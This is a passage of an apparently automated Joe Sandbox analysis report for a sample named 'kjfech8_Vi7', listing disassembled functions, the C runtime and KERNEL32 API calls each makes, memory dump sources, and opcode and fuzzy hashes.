                                                                                                          • Instruction Fuzzy Hash: 7A311FB4A0070AEFCB54CFA8C59099ABBF1FF09314B1089AED9569B611C330F985CF90
                                                                                                          Function 6FE006C2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6FDFFE57: $I10_OUTPUT.MSVCR100(?,?,00000016,?,?,?,6FE00196,00000000,?,?,000000FF,00000016,?,?,000000A3,?), ref: 6FDFFE98
                                                                                                            • Part of subcall function 6FDFFE57: strcpy_s.MSVCR100(6FE00196,?,?,?,?,00000016,?,?,?,6FE00196,00000000,?,?,000000FF,00000016,?), ref: 6FDFFEB8
                                                                                                          • _errno.MSVCR100(?,?,?,?,?,?,?,?,?,000000FF,?,?,?,?,00000000,00000000), ref: 6FE006F9
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,?,?,?,?,?,000000FF,?,?,?,?,00000000,00000000), ref: 6FE00700
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _errno.MSVCR100(000000A3,?,?,?,?,?,?,?,?,?,000000FF,?,?,?,?,00000000), ref: 6FE00711
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(000000A3,?,?,?,?,?,?,?,?,?,000000FF,?,?,?,?,00000000), ref: 6FE00718
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_noinfo$I10__invalid_parameterstrcpy_s
                                                                                                          • String ID: -
                                                                                                          • API String ID: 3497480935-2547889144
                                                                                                          • Opcode ID: 6d40abd33984ae3dbf7bfc299344f6401d82c06f01ef3d54b41956bd75848ccd
                                                                                                          • Instruction ID: be2f3559b535ef5b55603838c56321d7893dfe32e5cbb5ae6a71b194e428f80c
                                                                                                          • Opcode Fuzzy Hash: 6d40abd33984ae3dbf7bfc299344f6401d82c06f01ef3d54b41956bd75848ccd
                                                                                                          • Instruction Fuzzy Hash: 3F21A772A01209ABCB05BFB9CC449DE7F74AF49364F185119F515A7280EB74E511CBB1
                                                                                                          Function 6FDCAB7A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72threadCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6FDC035A: TlsGetValue.KERNEL32(6FDB6175), ref: 6FDC036C
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 6FDCABA2
                                                                                                          • swprintf_s.MSVCR100(?,00000401,[%d:%d:%d:%d(%d)] ,00000000,?,6FDCA924,?,?,000000F8), ref: 6FDCABCC
                                                                                                          • vswprintf_s.MSVCR100(00000401,00000401,?,?,?,00000002,?,6FDCA924,?,?,000000F8), ref: 6FDCABEE
                                                                                                          • wcslen.MSVCR100(?,00000401,00000401,?,?,?,00000002,?,6FDCA924,?,?,000000F8), ref: 6FDCABF4
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CurrentThreadValueswprintf_svswprintf_swcslen
                                                                                                          • String ID: [%d:%d:%d:%d(%d)]
                                                                                                          • API String ID: 2175577827-3832470304
                                                                                                          • Opcode ID: 66451c505641e9d90e1c641c227a71e9666603f893ed23e454db9c450b251b01
                                                                                                          • Instruction ID: e209ffe9eff34cf620a8b42c7bb30ce4987be6e639293eb02b98282e424f02cb
                                                                                                          • Opcode Fuzzy Hash: 66451c505641e9d90e1c641c227a71e9666603f893ed23e454db9c450b251b01
                                                                                                          • Instruction Fuzzy Hash: 321133362003009FC7619FB9CC58E1F77BEDF84324715851AE919CB2A0EB31F84287A2
                                                                                                          Function 6FDD6254 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 66COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDD6272
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDD627D
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_invalid_parameter_noinfo
                                                                                                          • String ID: B
                                                                                                          • API String ID: 340685940-1255198513
                                                                                                          • Opcode ID: 0c8620d0c78d6e113bf12d809b577cc16272df0cf94c1c30dbddbdc4c254b883
                                                                                                          • Instruction ID: 901cb63a8755f01181b6afcebf6521f21164c2af45941f6b2bcac6d0d3a06090
                                                                                                          • Opcode Fuzzy Hash: 0c8620d0c78d6e113bf12d809b577cc16272df0cf94c1c30dbddbdc4c254b883
                                                                                                          • Instruction Fuzzy Hash: A6111F7190421DDFDB409FE4DC419EEBBB8EB09324F144126F520B7181D779A9058BB5
                                                                                                          Function 6FDC65EF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 6FDC6632
                                                                                                          • GetLastError.KERNEL32 ref: 6FDC663F
                                                                                                          • ??0scheduler_resource_allocation_error@Concurrency@@QAE@J@Z.MSVCR100(00000000), ref: 6FDC6657
                                                                                                          • _CxxThrowException.MSVCR100(?,6FE20C48,00000000), ref: 6FDC6665
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ??0scheduler_resource_allocation_error@Concurrency@@CreateErrorEventExceptionLastThrow
                                                                                                          • String ID: hso
                                                                                                          • API String ID: 798786809-661648116
                                                                                                          • Opcode ID: d57412e36f1fcca52360fc8fc7e41ee12bf2de46efaf26c5d28f6c821c8a3ef3
                                                                                                          • Instruction ID: 459713a36a59e1a9a4c9dc8d6f72d55060753493853aa962ef268514159e2234
                                                                                                          • Opcode Fuzzy Hash: d57412e36f1fcca52360fc8fc7e41ee12bf2de46efaf26c5d28f6c821c8a3ef3
                                                                                                          • Instruction Fuzzy Hash: 1B118CB19007009FC360DF6AC885A2BBBECFF59224750492EF19AC7650E630F845CF65
                                                                                                          Function 6FD84D56 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51stringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • strcat_s.MSVCR100(6FD86E28,6FD86E07,6FD86E18,?,00000083,00000083,?,6FD86E1C,6FD86E07,6FD86E28,00000002,6FD86E28,6FD86E07,?,00000000,00000000), ref: 6FD84D75
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FD86E07,6FD86E28,00000002,6FD86E28,6FD86E07,?,00000000,00000000,00000005), ref: 6FDB0AC5
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000), ref: 6FDB0AD0
                                                                                                          • strcspn.MSVCR100(00000000,_.,,00000000,00000000,00000005), ref: 6FDB0ADE
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _invoke_watson$strcat_sstrcspn
                                                                                                          • String ID: _.,
                                                                                                          • API String ID: 3446206939-2709443920
                                                                                                          • Opcode ID: 017b8fcd838a6ccf83725c70813166adc93715a3cd839d596d7e7c7fb797814b
                                                                                                          • Instruction ID: ef62935df09f77386809d499fab73a5b78543d7a58a46bab2cbf9235d9797d87
                                                                                                          • Opcode Fuzzy Hash: 017b8fcd838a6ccf83725c70813166adc93715a3cd839d596d7e7c7fb797814b
                                                                                                          • Instruction Fuzzy Hash: 63F090B3504349EBDB901F659D40C8B376EFF822BCB115A3AFD7A56081CB31F5528AA0
                                                                                                          Function 00D012C2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __set_app_type.MSVCR100(00000001), ref: 00D01310
                                                                                                          • EncodePointer.KERNEL32(000000FF), ref: 00D01319
                                                                                                          • __setusermatherr.MSVCR100(Function_000016F6), ref: 00D0135B
                                                                                                          • _configthreadlocale.MSVCR100(000000FF), ref: 00D01372
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612452283.0000000000D01000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D00000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612359297.0000000000D00000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30612550523.0000000000D02000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30612649247.0000000000D04000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_d00000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: EncodePointer__set_app_type__setusermatherr_configthreadlocale
                                                                                                          • String ID: .$
                                                                                                          • API String ID: 3937316565-2223841709
                                                                                                          • Opcode ID: da0c5dc0edecdfdbe34df4f9552d69e6f4c6fa8d6160665d6d1e003ba59f99be
                                                                                                          • Instruction ID: 6c395e82980b9d00bed5265bd227e34c1fb473eb0be2410b55a664e03a00fd52
                                                                                                          • Opcode Fuzzy Hash: da0c5dc0edecdfdbe34df4f9552d69e6f4c6fa8d6160665d6d1e003ba59f99be
                                                                                                          • Instruction Fuzzy Hash: 07111578902340DFDB28AF64EC4976937A4E704321F18866AE41DC63F1DB758984CF31
                                                                                                          Function 6FDD2152 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(00000000,00000000,X_o,6FDD22CA,X_o,?,?,?,00000000), ref: 6FDD215F
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(00000000,00000000,X_o,6FDD22CA,X_o,?,?,?,00000000), ref: 6FDD216A
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • free.MSVCR100(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6FDD21AF
                                                                                                          • free.MSVCR100(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6FDD21B7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: free$_errno_invalid_parameter_invalid_parameter_noinfo
                                                                                                          • String ID: X_o
                                                                                                          • API String ID: 4554520-656684892
                                                                                                          • Opcode ID: 29de8854bc3e8053973dcaa0d0c50b5c389a0eafaee6f5edb47c6319f646a84f
                                                                                                          • Instruction ID: 9f5f68fda2ae13f9e73c6df49b45fd28cdee567ab6db1289925066f6a526af45
                                                                                                          • Opcode Fuzzy Hash: 29de8854bc3e8053973dcaa0d0c50b5c389a0eafaee6f5edb47c6319f646a84f
                                                                                                          • Instruction Fuzzy Hash: 1B01FB72800208FBDF415F94CC04ACE7B7AEF05369F004291F929A51E4E771EAA5DBA0
                                                                                                          Function 6FDCAAE1 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39threadCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CreateThread.KERNEL32(00000000,-00000018,6FDC0EC3,00010000,6FDC0EB1,?), ref: 6FDCAB1D
                                                                                                          • GetLastError.KERNEL32 ref: 6FDCAB27
                                                                                                          • ??0scheduler_resource_allocation_error@Concurrency@@QAE@J@Z.MSVCR100(00000000), ref: 6FDCAB3F
                                                                                                          • _CxxThrowException.MSVCR100(?,6FE20C48,00000000), ref: 6FDCAB4D
                                                                                                            • Part of subcall function 6FDCAA54: GetModuleHandleA.KERNEL32(00000000), ref: 6FDCAA6B
                                                                                                            • Part of subcall function 6FDCAA54: GetModuleFileNameW.KERNEL32(6FD70000,?,00000104), ref: 6FDCAA87
                                                                                                            • Part of subcall function 6FDCAA54: LoadLibraryW.KERNEL32(?), ref: 6FDCAA98
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Module$??0scheduler_resource_allocation_error@Concurrency@@CreateErrorExceptionFileHandleLastLibraryLoadNameThreadThrow
                                                                                                          • String ID: \so
                                                                                                          • API String ID: 366444775-3095705423
                                                                                                          • Opcode ID: cb4349b5f232ad85bdd086a5d19b1753afca7086b4eb5eaa26f355c199025ce6
                                                                                                          • Instruction ID: 9d519490c9c97228be6ea4eaf69e241ef4bf23eb9c6090c852e6fb2f8f799549
                                                                                                          • Opcode Fuzzy Hash: cb4349b5f232ad85bdd086a5d19b1753afca7086b4eb5eaa26f355c199025ce6
                                                                                                          • Instruction Fuzzy Hash: 99F0C2311043469BDF899FA48C12A9E3B6ABF04315F24002CF506DA090EB34F921AB62
                                                                                                          Function 6FDF2F68 Relevance: 7.9, APIs: 5, Instructions: 367COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(?,?,?,6FDF34C9,?,?,00000000,?,?,?,00000000,?,?,?), ref: 6FDF3278
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,?,6FDF34C9,?,?,00000000,?,?,?,00000000,?,?,?), ref: 6FDF3283
                                                                                                          • __tzname.MSVCR100(000000FF,?,?,?,?,6FDF34C9,?,?,00000000,?,?,?,00000000), ref: 6FDF32E0
                                                                                                          • _mbstowcs_s_l.MSVCR100(00000000,?,?,00000000,000000FF,?,?,?,?,6FDF34C9,?,?,00000000,?,?,?), ref: 6FDF3301
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 6FDF332C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __tzname_errno_invalid_parameter_noinfo_invoke_watson_mbstowcs_s_l
                                                                                                          • String ID:
                                                                                                          • API String ID: 1540807873-0
                                                                                                          • Opcode ID: 488f6ddb631ee458a1a26901e5cb70623f26af06bd0553aed63feaf984941dea
                                                                                                          • Instruction ID: c6ec978cbf9bf5a6eaf7958521d1ad3be5067919177a084a5627efd7137cbd5f
                                                                                                          • Opcode Fuzzy Hash: 488f6ddb631ee458a1a26901e5cb70623f26af06bd0553aed63feaf984941dea
                                                                                                          • Instruction Fuzzy Hash: 95C19C75702306EBDF848F68D943F9A3BA2BB46354F134216F850DB264C635F8538BA2
                                                                                                          Function 6FDE06BF Relevance: 7.7, APIs: 5, Instructions: 170COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _strnicmp.MSVCR100(?,?,6FDD396D,?,00000109,00000000,?,6FDD396D,?,UTF-8,00000005,?,?,00000000), ref: 6FDE06FE
                                                                                                          • _errno.MSVCR100(?,00000109,00000000,?,6FDD396D,?,UTF-8,00000005,?,?,00000000), ref: 6FDE0720
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,00000109,00000000,?,6FDD396D,?,UTF-8,00000005,?,?,00000000), ref: 6FDE072B
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _errno.MSVCR100(00000080,?,00000109,00000000,?,6FDD396D,?,UTF-8,00000005,?,?,00000000), ref: 6FDE074E
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(00000080,?,00000109,00000000,?,6FDD396D,?,UTF-8,00000005,?,?,00000000), ref: 6FDE0759
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_noinfo$_invalid_parameter_strnicmp
                                                                                                          • String ID:
                                                                                                          • API String ID: 3445316951-0
                                                                                                          • Opcode ID: 230f526b85f2b77e6922cbea267158b5cc488bcfc5b82917295f4089315ad115
                                                                                                          • Instruction ID: df321eabeaaa421e595421b3cfcd4fa3dd5feede492d21c4c2f2192af4b1b6ab
                                                                                                          • Opcode Fuzzy Hash: 230f526b85f2b77e6922cbea267158b5cc488bcfc5b82917295f4089315ad115
                                                                                                          • Instruction Fuzzy Hash: 2561057180439ADFCF98AF64C4985ED7B70FF01398F54929AD4E01F192EB31A591DBA0
                                                                                                          Function 6FDE0FDD Relevance: 7.7, APIs: 5, Instructions: 155COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _strnicmp.MSVCR100(00000000,00000000,00000000,00000000,00000000), ref: 6FDE100C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _strnicmp
                                                                                                          • String ID:
                                                                                                          • API String ID: 2635805826-0
                                                                                                          • Opcode ID: 97e9a17159df900e2c9432a234bd104b95ee29784a787be956378dba4387d4f5
                                                                                                          • Instruction ID: 1ae6e16f7bce73c035de10ff4e6f7d2ce20dcc4726c9a949cc45b6ecfe486138
                                                                                                          • Opcode Fuzzy Hash: 97e9a17159df900e2c9432a234bd104b95ee29784a787be956378dba4387d4f5
                                                                                                          • Instruction Fuzzy Hash: 19513376A08399DBDB99CF68C0507EA7BB0FF02728F1482DAD4A11B1D1D331EA85E750
                                                                                                          Function 6FDE02CE Relevance: 7.6, APIs: 5, Instructions: 117stringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • strncmp.MSVCR100(?,?,00000000,00000080,00000080), ref: 6FDE02FE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: strncmp
                                                                                                          • String ID:
                                                                                                          • API String ID: 1114863663-0
                                                                                                          • Opcode ID: fcf98cdb03d2ce117ffa6c6ee89bf8cf0b064f5cd0a372b9dccf187f44ef26a4
                                                                                                          • Instruction ID: 72e998496436823bba0770e3867b5a101d77e112fd5a08c010917b884f30892d
                                                                                                          • Opcode Fuzzy Hash: fcf98cdb03d2ce117ffa6c6ee89bf8cf0b064f5cd0a372b9dccf187f44ef26a4
                                                                                                          • Instruction Fuzzy Hash: 9241FF3081439ADFDB52BF64C4487AD3BB0AF123A9F14539AE8F05A0D1CB74B542D7A1
                                                                                                          Function 6FDE0BDC Relevance: 7.6, APIs: 5, Instructions: 111stringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • strncmp.MSVCR100(00000000,?,00000000,?,?), ref: 6FDE0C19
                                                                                                          • _errno.MSVCR100(?,?,?), ref: 6FDE0C3F
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,?), ref: 6FDE0C4A
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _errno.MSVCR100(?,?,?,?), ref: 6FDE0C6E
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,?,?), ref: 6FDE0C79
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_noinfo$_invalid_parameterstrncmp
                                                                                                          • String ID:
                                                                                                          • API String ID: 2244377858-0
                                                                                                          • Opcode ID: 989de4fe64ac7fb5363c1031c15453bbd91eeb5e7c5a7740d970707172cdee37
                                                                                                          • Instruction ID: 0c6fd2e87aa6978124baf367de8556646cc02d58d74912d0a1b17264577b1edc
                                                                                                          • Opcode Fuzzy Hash: 989de4fe64ac7fb5363c1031c15453bbd91eeb5e7c5a7740d970707172cdee37
                                                                                                          • Instruction Fuzzy Hash: 29412530854389DBDB529F68C4487AD3BF0AF013A9F14539AD8F15B1E5CB34B692C7A1
                                                                                                          Function 6FDC6B35 Relevance: 7.6, APIs: 5, Instructions: 104COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • ??2@YAPAXI@Z.MSVCR100(000000C0,32054ECC), ref: 6FDC6B6A
                                                                                                            • Part of subcall function 6FD8232B: malloc.MSVCR100(?), ref: 6FD82336
                                                                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 6FDC6C64
                                                                                                            • Part of subcall function 6FDC9684: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 6FDC96E8
                                                                                                            • Part of subcall function 6FDC9684: GetLastError.KERNEL32(?,00000000), ref: 6FDC96F5
